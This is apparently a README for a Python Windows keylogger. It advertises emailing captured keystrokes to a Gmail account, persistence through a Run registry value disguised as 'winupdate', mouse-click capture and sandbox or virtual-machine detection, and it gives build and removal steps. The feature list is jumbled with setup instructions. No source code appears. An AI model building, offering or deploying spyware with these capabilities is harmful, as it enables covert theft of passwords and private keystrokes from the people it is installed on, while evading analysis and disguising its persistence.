This program is an object oriented windows keylogger written in python3.
This program requires:
- Download the repository using github or git.
- Install the modules above one by one or install them all at once by running
python -m pip install -r requirements.txt
- Ability to send logs to any gmail account.
- Ability to store logs locally.
- Ability to add to startup.
- Ability to log special characters.
- Ability to capture window mouse clicks.
- Ability to check for sandboxie/virtual machine.
- And more...
- Navigate to
src
in windows explorer. - Right-click while holding shift to open powershell window.
- Run
python setup.py
to build the .exe. - Open the
dist
folder and run the compiled .exe.
NOTE: Env Variables such as
%userprofile%
and%tmp%
are allowed in the log path. Also, if sending logs to a gmail account, that account must have allowed access for less secure apps.
- Enter
shift+F1
or kill the program in task manager. - If the program was added to startup, open regedit, navigate to
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
, and deletewinupdate
value.